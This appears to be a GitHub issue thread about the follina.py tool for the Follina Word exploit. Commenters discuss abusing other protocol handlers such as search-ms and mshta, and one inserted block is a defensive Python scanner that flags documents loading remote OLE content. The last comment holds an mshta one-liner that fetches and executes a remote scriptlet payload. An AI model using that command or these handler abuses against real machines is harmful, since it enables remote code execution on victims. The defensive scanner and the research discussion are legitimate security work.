Open hastalamuerte opened 1 year ago
Seems it's possible.
And one question: should I always host an HTML payload for hooking msdt, or if I choose -c will it be inside the doc with my command? https://github.com/j00sean/CVE-2022-44666 (something using search-ms)
Hi, thanks for your suggestion! As far as I'm aware, most protocol handlers that have an abuse case with public CVE have been patched one way or another. However, I'm sure there are plenty more abusable protocols to be discovered in the depths of Microsoft's products :). This project could be used as a boilerplate for that. Feel free to submit PRs or fork if you find anything interesting!
W.r.t. your other question: The remote doc is required for the command execution for this specific CVE.
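As an added, defender-side example (not code from this thread or from the follina.py project): the reply above notes that the remote document is what carries the command execution for this CVE, so a cheap triage step is to flag .docx files whose relationship parts reference an external resource. The Python script below scans every *.rels part of a document for TargetMode="External" relationships and flags OLE-object / attached-template relationships fetched over http(s), while leaving ordinary hyperlinks alone. The two sample documents, the helper that builds them, and the placeholder host name (`placeholder.invalid`) are constructed here so the script runs offline.

```python
"""Triage a .docx for relationships that pull content from a remote host.

Added example, not part of the issue thread or the follina.py project.
A document of the shape discussed in the thread carries a relationship in
word/_rels/document.xml.rels whose Target is an external URL
(TargetMode="External"), typically an oleObject pointing at a remotely
hosted HTML page. Flagging such relationships is a defender's triage step.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types that should never need to fetch content over the network.
SUSPICIOUS_REL_TYPES = {"oleObject", "attachedTemplate", "frame"}


def external_targets(docx_bytes: bytes) -> list[dict]:
    """Return every relationship in any *.rels part marked TargetMode="External"."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    # Keep only the last path segment of the type URI (e.g. "oleObject").
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "scheme": urlparse(target).scheme.lower(),
                })
    return findings


def is_suspicious(finding: dict) -> bool:
    """Remote OLE objects / templates over http(s) are the shape to flag.
    External hyperlinks are normal in documents and are not flagged."""
    return (finding["type"] in SUSPICIOUS_REL_TYPES
            and finding["scheme"] in {"http", "https"})


def triage(docx_bytes: bytes) -> list[dict]:
    """Return only the external relationships worth an analyst's attention."""
    return [f for f in external_targets(docx_bytes) if is_suspicious(f)]


def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx: just enough parts for the scanner to read."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("word/document.xml",
                    "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: a normal document with a stylesheet and one web hyperlink.
BENIGN_RELS = f"""<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

# Constructed sample: an OLE object whose content lives on a remote host.
# The host is a placeholder (.invalid is a reserved TLD), not a real indicator.
REMOTE_OLE_RELS = f"""<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}oleObject" Target="http://placeholder.invalid/remote.html" TargetMode="External"/>
</Relationships>"""


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("remote-ole", REMOTE_OLE_RELS)):
        hits = triage(build_sample_docx(rels))
        print(f"{label}: {'FLAG' if hits else 'ok'} {hits}")
```

On a real file, call `triage(open(path, "rb").read())`; a non-empty result means the document will reach out to a remote host the moment Word resolves the relationship, which is the property worth alerting on regardless of which protocol handler the remote content ends up invoking.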
Hi @hastalamuerte, IMO this is quite a different type of protocol handler, and not related to the Follina exploit as it stands. If you would like to see it integrated in the tool I'm open to suggestions, but due to the user interaction I'm not sure how it would fit to be honest.
@chvancooten thanks for your follina script!
What if msdt isn't used? Can MS Word spawn some other URL handlers that can execute pwsh?
Here are a few of them that have bypass and execute options. Here is mshta: nandisec/mshta@909383b, and here is a list: https://lolbas-project.github.io/#
Like mshta.exe vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")), something like that